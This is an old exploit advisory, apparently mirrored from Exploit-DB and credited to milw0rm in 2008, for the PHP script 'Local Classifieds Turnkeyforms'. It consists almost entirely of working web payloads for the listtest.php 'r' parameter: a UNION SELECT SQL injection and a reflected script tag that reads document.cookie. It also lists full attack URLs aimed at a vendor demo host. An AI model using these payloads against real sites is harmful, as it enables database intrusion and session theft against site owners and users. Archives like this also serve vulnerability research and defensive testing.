exploit-db-mirror/exploits/php/webapps/7035.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

37 lines
No EOL
754 B
Text

##################################################################
#
# Author: TR-ShaRk
#
######################
#
# Web : StarHack.Us OldKral.Com
#
######################
#
# Emai : Admin@tr-shark.org
#
######################
#
# Script : Local Classifieds Turnkeyforms
#
######################
#
# SQL Injection Vuln. :
#
# listtest.php?r=-39+union+select+1,@@version--
#
# Xss:
#
# listtest.php?r="><script>alert(document.cookie)</script>
#
######################
#
# Demo:
#
#
# http://demo.turnkeyforms.com/localclassifieds/listtest.php?r="><script>alert(document.cookie)</script>
# http://demo.turnkeyforms.com/localclassifieds/listtest.php?r=-39+union+select+1,@@version--
#
######################
# milw0rm.com [2008-11-07]